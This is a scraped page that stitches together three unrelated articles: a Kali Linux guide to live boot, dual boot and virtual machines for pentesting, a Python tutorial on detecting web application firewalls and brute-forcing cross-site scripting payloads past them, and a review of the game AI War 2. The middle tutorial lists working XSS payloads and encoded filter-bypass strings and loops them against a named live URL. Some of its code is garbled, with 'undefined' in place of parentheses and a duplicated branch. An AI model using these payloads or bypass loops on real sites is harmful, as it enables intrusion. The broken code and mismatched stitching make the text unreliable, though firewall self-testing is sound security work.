Dual boot performs faster than live boot, and has persistence (though live boot with persistence is also available, but that is limited persistence). If you are using live USB, then you have to keep updating the ISO version on the USB frequently (download a new ISO, then write that ISO to the USB). If you have dual boot, then you’ll update Kali the usual way (using apt-get update, upgrade, and dist-upgrade).

I have put this point of comparison first because this is the only point of difference between live boot and dual boot. The two are identical in every other aspect, and from here on, I’ll use live boot to refer to both live boot and dual boot.

Hardware access

In live booting, when you are running Kali, it would be the sole owner of all the resources that the computer offers (except hard disk space which is occupied by Windows, which is not a major concern). Not only that, it will have access to internal wireless card of your machine. We’ll get a better idea of what hardware advantages we are getting by looking at what we don’t get when we are inside Virtual Machine.

When Kali is running from inside a virtual machine, it doesn’t have access to-

1. Full CPI / GPU power (because processor needs to be shared between the two simultaneously running OSs) – So, this will mean slower cracking (processor intensive task like cracking WPA-2 4-way handshake will suffer here).
2. No direct access to internal hardware, only bridged access – What this means for you is that you can’t access the internal wireless adapter of your laptop. So, for wireless hacking, you will need to purchase an external wireless adapter if you are working inside a VM. (even if you are live/dual booting, you may need to purchase an external wireless card, because internal wireless cards are weaker, have less driver support, and sometimes don’t support injection, which is needed in many attacks).

So, for wireless hacking, Virtual Machine isn’t the best way to go.

Networking

In live booting, you are a direct part of the local network you are connected to. In virtual booting, your host computer is a part of that network, and you are part of internal network which contains only you, your host, and other guests.

First, let me explain some technical jargon-

1. Internal network – When you connect to your wifi router, you, along with other connected devices (your iphone, android phone, macbook, PC, etc.) become part of a local network. The internet knows only about your router. Every communication must be sent via the router to the internet, the internet will respond to router, and router will return the response to the appropriate system on the local network.
2. VMnet – This is an equivalent of internal network, with the guest virtual machines, and the host machine a part of it.
3. Host machine – The machine on which Vmware/virtualbox is installed, and inside which the virtual machines are running.
4. Guest machine – The machines inside virtualbox/vmware.
5. Internal IP – Your IP on the local network
6. VMnet IP – Your IP on the Virtual network (VMnet) [This is not a standard term, internal and external IPs are standard terms, this I’m using for convenience]
7. External IP – Your IP on the internet.

If any of the machine make a request to the internet, their external IP would be the same. To check this, open your smartphone, and search “Whats my IP on google”. Repeat this from all your other devices connected to the same router. Each one will have the same IP. Internally, all the devices have a different internal IP (the router has an internal IP too, like any other device on the local network).

Similarly, when you send a request from any of the VM guests to a machine outside the VMNet, but inside the local network, you’ll carry the internal IP of your VM host (i.e. the Windows machine). Internally, all the guests have a VMnet IP (the host has one too, and inside the VMnet, behaves like guests).

Let me explain this a bit further with pictures.

Here, the kali machine is a part of VMNet, and can’t directly contact the mac machine and android machine. To reach them, it has to go via the Windows machine. The router doesn’t know about the existence of Kali Machine (or the Windows XP machine). The path to the internet involves both the host machine, and the router.

Here, Kali is directly a part of the Local network. Here, the router knows about the Kali Machine. Also, the path to the internet involves only the router.

So, what does this mean for us?

1. If you want to practice penetration testing, VMs can be great. You can have a Windows host, and Kali running as a virtual machine. Alongside, you can have Windows XP running as another guest VM. Now, these are a part of VMNet and directly connected. So, you can easily perform any attacks from Kali to this machine.
2. If you want to do real life pentesting, your target is probably over the internet. In that case, having Kali inside a virtual machine doesn’t help. Firstly, even if you are live booting Kali, you are a part of the local network, and to communicate with your target over the internet, you need to “forward” your requests through the router (this is called port forwarding). This, in itself, can sometimes be a pain in the ass. If you are inside a VM, your path to your target would involve your router, your host machine, and then the Kali Machine. This is quite inconvenient. So, if you want to attack someone over the internet, being in a virtual machine sucks.

In other words, your guest machine (Kali) does not have access to your laptop’s network card. It has bridged access to it. In theory, you can still use most of the functionality of the card, but in practice, it’s a painstakingly hard job. You can, however, add an external card and give it to the Kali guest instead of the windows host, mitigating this problem. Read the food for thought below for more-

Food For Thought

When you are inside a virtual machine, you are using your host to connect to the internet. But that doesn’t have to be the case. You can plug in an external wireless card, and connect to the router directly. That would mean, that you are now a part of VMNet, as well as a part of LAN (your wlan0 card gets allocated an internal IP on the LAN (WLAN), say 192.168.1.5. Now, you don’t need your host for internet access, and as far as the router is concerned, you are a separate computer. So, this does solve the problem that being inside a virtual machine causes. (I’m too lazy to draw a diagram for that, but in this case, the diagram will have Kali as a part of both the internal network dotted box, and the VMnet dotted box. This is exactly equivalent to the condition Windows 8/10 machine in the first diagram. It will also have two IPs, one for VMnet, and one for LAN).

Ease/Risk

Live boot is the easiest to perform, and the least risky.

Virtual machine is a bit harder, but still not risky.

Dual boot is tough, and you run the risk of losing your data/ getting rid of your original OS, etc.

Also, sometimes Dual Booting can be next to impossible. For example, some laptops with Microsoft signature (the 2-in-1, laptop+tablet types usually) addition don’t let you dual boot anything alongside Windows.

Forensics

Live booting doesn’t leave behind many traces, other two methods do.

How to find installation guides

For finding guides, keep the following pointers in mind-

1. Consult multiple resources before doing anything. There are thousands of guides for installing Kali, and there’s no ‘best’ guide.
2. Make sure to read the official documentation.
3. Make sure not to limit yourself to just written tutorials, or just YouTube videos. Both has their own advantages and disadvantages.
4. Consult tutorials for your precise versions of software (how to install Kali Rolling alongside Window 10), not simply Kali alongside Windows. There are only a few minor difference across the various releases, and their install instructions, but when you’re doing it for the first time, these minor differences are important.
5. Live USB is the easiest, go for it first. Go for Virtual machine if you’re interested in practicing Penetration Testing.
6. Even the easiest method, Live USB, isn’t trivial. If you’re a beginner, even that will require some efforts (changing boot order/ choosing USB as boot device, finding a proper software for making bootable USB, etc.). Don’t get discouraged.

Extra Advice

• For wireless hacking, don’t even think about anything, go for live boot, it’s a no brainer.
• For pentesting, when you’re just getting started and need to practice on local targets, go for Virtual machine.
• When you’re comfortable with Linux, and feel that you can use Kali for usual stuff, only then install Kali alongside Windows. Still, I won’t suggest using Kali as your primary OS.
• If you love Linux, and love challenges, then install Kali as your primary OS. If you do, see if you’re able to figure out how to install Skype on Kali rolling release (if you succeed, please let me know. I haven’t been able to do it so far, and anyways, skype web works fine).

The last point tells me that I’m getting carried away now, and this post needs to come to and end. Hope you learnt a lot. Let me know if you feel that there’s something important worth inclusion that I missed.

Source

Web application firewalls are usually placed in front of the web
server to filter the malicious traffic coming towards server. If you are
hired as a penetration tester for some company and they forgot to tell
you that they are using web application firewall than you might get into
a serious mess. The figure below depicts the working of a simple web
application firewall:

As
you can see its like a wall between web traffic and web server, usually
now a days web application firewalls are signature based.

What is a signature based firewall?

In
a signature based firewall you define signatures, as you know web
attacks follow similar patters or signatures as well. So we can define
the matching patterns and block them, i.e.

Payload :- <svg><script>alert&grave;1&grave;<p>

The
payload defined above is a kind of cross site scripting attack, and we
know that all these attacks can contain following substring -> “<script>”,
so why don’t we define a signature that can block a web traffic if it
contains this sub string, we can define 2-3 signatures as defined below:

1. <script>
2. alert(*)

First
signature will block any request that contains <script>
substring, and second one will block alert(any text). So, this is how
signature based firewall works.

How to know there is a firewall?

If
you are performing a penetration test and you didn’t know that there
was a firewall blocking the traffic than it can waste a lot of your
time, because most of the time your attack payloads are getting blocked
by the firewall not by your application code, and you might end up
thinking that the application you are testing have a secure good and is
good to go. So, it is a good idea to first test for web application
firewall presence before you start your penetration test.

Most of
the firewalls today leave some tracks about them, now If you attack a
web application using the payload we defined above and get the following
response:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

requested resource could not be found on this server. This error was generated by Mod_Security.

You
can clearly see that your attack was blocked by the Mod_Security
firewall. In this article we will see how we can develop a simple python
script that can do this task detecting firewall and bypassing it.

Step 1: Define HTML Document and PHP Script!

We
will have to define our HTML document for injection of payload and
corresponding PHP script to handle the data. We have defined both of
them below.

We will be using the following HTML Document:

<html>
<body>
<form name=”waf” action=”waf.php” method=”post”>
Data: <input type=”text” name=”data”><br>
<input type=”submit” value=”Submit”>
</form>
</body>
</html>

PHP Script:



<html>
<body>
Data from the form : <?php echo $_POST[“data”]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!

Our
second step towards detecting the firewall presence is creating a
malicious cross site scripting request that can be blocked by the
firewall. We will be using a python module called ‘Mechanize’, to know
more about this module please read the following article :

If
you already know about Mechanize, you can skip reading the article. Now
that you know about Mechanize, we can select the web form present on
any page and submit the request. Following code snippet can be used to
do that:

import mechanize as mec
maliciousRequest = mec.Browser()
formName = ‘waf’
maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_form(formName)

Lets discuss this code line wise:

1. On the first line we’ve imported the mechanize module and given it a short name ‘mec’ for later reference.
2. To
   download a web page using mechanize, instantiation of browser is
   required. We’ve just did that in the second line of the code.
3. On
   the first step we’ve defined our HTML document, in which the form name
   was ‘waf’, we need to tell mechanize to select this form for submission,
   so we’ve this name in a variable called formName.
4. Than we
   opened this url, just like we do in a browser. After the page gets
   opened we fill in the form and submit data, so opening of page is same
   here.
5. Finally we’ve selected the form using ‘select_form’ function passing it ‘formName’ variable.

As
you can see in the HTML source code, that this form have only one input
field, and we are going to inject our payload in that field and once we
receive response we’re going to inspect it for know strings to detect
the presence of the web application firewall.

Step 3: Prepare the payload

In our HTML document we’ve specified one input field using this code:

input type=”text” name=”data”><br>

You can see that name of this field is ‘data’, we can use following bit of code to define input for this field :

crossSiteScriptingPayLoad = “<svg><script>alert&grave;1&grave;<p>”

maliciousRequest.form[‘data’] = crossSiteScriptingPayLoad

1. First line saves our payload in a variable.
2. In a second line of code, we’ve assigned our payload to a form field ‘data’.

We can now safely submit this form and inspect the response.

Step 4: Submit the form and record Response

Code I am going to mention after this line will submit the form and record the response:

maliciousRequest.submit()
response = maliciousRequest.response().read()

print response

1. Submit the form.
2. Save the response in a variable.
3. Print the response back.

As I currently have no firewall installed, the response I got is :

As
you can see that payload is printed back to us, means no filtering is
present on the application code and due to the absence of firewall our
request was also not blocked.

Step 5: Detect the Presence of firewall

Variable
named ‘response’ contains the response we got from server, we can use
the response to detect presence of firewall. We will try to detect the
presence of following firewalls in this tutorial.

1. WebKnight.
2. Mod_Security.
3. Dot Defender.

Let see how we can achieve this with python code:

if response.find(‘WebKnight’) >= 0:
print “Firewall detected: WebKnight”
elif response.find(‘Mod_Security’) >= 0:
print “Firewall detected: Mod Security”
elif response.find(‘Mod_Security’) >= 0:
print “Firewall detected: Mod Security”
elif response.find(‘dotDefender’) >= 0:
print “Firewall detected: Dot Defender”
else:
print “No Firewall Present”

If Web Knight firewall is
installed and our request got blocked, response string will contain
‘WebKnight’ inside it some where, so find function will return value
greater than 0, that means WebKnight firewall is present. Similarly we
can check for other 2 firewalls as well.

We can extend this small application to detect for as many number of firewalls, but you must know there response behavior.

Using Brute force to bypass Firewall filter

I’ve
mentioned in the start of the article that mostly firewall these days
block requests based on signatures. But there are hundreds and thousands
of ways you can construct a payload. Java script is becoming complex
day by day, we can make a list of payloads, and try each of them, record
each response and check if we was able to bypass the firewall or not.
Please note that if firewall rules are well defined than this approach
might not work. Let see how we can brute force using python:

listofPayloads = [‘&lt;dialog open=”” onclose=”alertundefined1)”&gt;&lt;form method=”dialog”&gt;&lt;button&gt;Close me!&lt;/button&gt;&lt;/form&gt;&lt;/dialog&gt;’, ‘&lt;svg&gt;&lt;script&gt;prompt&amp;#40 1&amp;#41&lt;i&gt;’, ‘&lt;a href=”&amp;#1;javascript:alertundefined1)”&gt;CLICK ME&lt;a&gt;’]
for payLoads in listofPayloads:
maliciousRequest = mec.Browserundefined)
formName = ‘waf’
maliciousRequest.openundefined”http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_formundefinedformName)
maliciousRequest.form[‘data’] = payLoads
maliciousRequest.submitundefined)
response = maliciousRequest.responseundefined).readundefined)
if response.findundefined’WebKnight’) &gt;= 0:
print “Firewall detected: WebKnight”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’dotDefender’) &gt;= 0:
print “Firewall detected: Dot Defender”
else:
print “No Firewall Present”

1. On the first line we’ve defined a list of 3 payloads, you can extend this list and add as many payloads as you require.
2. Then inside the for loop we did the same process we did above, but this time for each payload in a list.
3. Upon receiving response we again compare and see see if firewall is present on not.

As I’ve had no firewall installed, my output was:

Convert HTML Tags to Unicode or Hex Entities

If
for example firewall is filtering html tags like <, >. We can
send their corresponding Unicode or Hex Entities and see if they are
being converted to there original form, if so, than this could be an
entry point as well. Code below can be used to examine this process:

listofPayloads = [‘&lt;b&gt;’,’u003cbu003e’,’x3cbx3e’]
for payLoads in listofPayloads:
maliciousRequest = mec.Browser()
formName = ‘waf’
maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_form(formName)
maliciousRequest.form[‘data’] = payLoads
maliciousRequest.submit()
response = maliciousRequest.response().read()
print “—————————————————”
print response
print “—————————————————”

Each
time we will send the encoded entry and in the response we will examine
if it got converted or printed back without conversion, when I ran this
code I got the this output :

Means none of the encoded entry got converted to its original form.

Conclusion

The
purpose of this article was to train you in advance so that you can
penetrate your firewall before a hacker can do. It is always a good
choice to self test your network infrastructure for vulnerabilities,
because our first concern always is to get our application up and
running and we overlook the security part. But it must not be over
looked, because later it can be a huge headache.

Complete source code can be downloaded from this

link

.

Author Info:

Usman Nasir, founder, and author of Cyberpersons
is a Computer Science student. I also worked as a technical support
staff at various hosting companies and love to write about Linux and web
application security.

Source

October 3, 2018

Source

Source

AI War 2 from Arcen Games has finally entered Early Access today after being funded on Kickstarter back at the end of 2016. Thankfully, they’ve lived up to their promise of Linux support as it’s available right away.

AI War 2 is a grand strategy RTS hybrid against an overwhelming, inhuman enemy who has conquered the galaxy. The enemy has made only a single error: underestimating you. You must steal as much technology as you can, take enough territory to fortify your bases and launch your attacks. But every conquest you make turns the attention of the AI ever more in your direction… so choose your targets with care.

AI War 2 is the epic sequel to 2009’s space strategy hit, AI War: Fleet Command — critically acclaimed for its dastardly AI and totaling nearly 2 million units sold, with more than 650,000 base game sales and 1.15m expansion purchases made to date.

Current features:

• Many optional factions, each with their own goals and strategy, creating a living galaxy.
• Polished gameplay mechanics, representing everything learned from the original AI War: Fleet Command’s six expansions.
• Redesigned UI, currently going through iterations.
• Over 1700 lines of spoken dialogue from more than 25 actors, and more to come for the AI itself.
• 1.5 hours of new music added to the 4.5 hour score included from the original AI War: Fleet Command.
• A ton of map types, with a lot of sub-options to make them even more varied.
• Crazy moddability, with many levers available in easily-accessible XML.
• Multithreading for modern performance, and a codebase that will not summon an elder god.

It will have multiplayer, but it’s currently disabled while they work on it. Naturally, it would be silly to review such a game right now since it’s still quite early. Any depth I talk about it will probably be irrelevent in a month’s or week’s time. Still, some basic thoughts would help here. After spending some time with it, I can certainly see a lot of promise in it. While I like it, there’s obviously a number of rough spots.

The UI for example, feels like it’s always in the way with this big bulky thing attached to the left of your screen although they do plan to let you close it. There is a tutorial which does an okay job at directing you through the real basics, although for me nothing actually happened once I had finished all the objectives on it which was a little bit odd, a bug I assume. The tutorial does miss out covering certain aspects of the game like hacking, mercenaries and likely more. There’s also a few times where zooming suddenly doesn’t work when you have units selected, which i also assume is a bug.

Performance so far seems to be pretty good, I haven’t noticed any stuttering or large drops overall it does seem quite smooth so they’ve done a pretty good job.

For those of you appreciate a good view, it certainly becomes a light show during the larger battles. Lasers and all sorts firing across the screen, it lights up the darkness of space for sure. It’s not a game for those who want to be up close and personal with the action though, since most of your time is will likely be spent zoomed out where everything becomes icons since you’re managing hundreds of units. It’s a good feature, one I liked from playing games like Supreme Commander years ago, but it makes you feel a little too detached from the action. Thankfully, you can slow down time holding CTRL while pressing the minus key to slow it down and the plus key to speed it back up.

It’s a game that seems easy enough to get into (easier than the first game, at least to me), but getting good at it is something that will come with a lot of practice. Managing your resources, your ships, spending you research points wisely and learning how to both attack and defend is vital. You might find your home base under attack while your fleet is far away, it’s a very interesting grand tug of war. Moving too fast across the galaxy might land you in some hot water, so be careful how quickly you expand. I got utterly annihilated on my second proper game as I just wasn’t properly prepared for an AI invasion, a big one too!

If you enjoy large scale strategy games like Total Annihilation, Supreme Commander, Spring RTS games and so on you might quite like this. It still plays very differently though, with you dealing with many different planets as you spread yourself across the galaxy. I’ve hardly scratched the surface of it with multiple hours already.

Bugs are to be expected of course since it’s an unfinished Early Access game. With that in mind, find it on Humble Store and Steam.

Source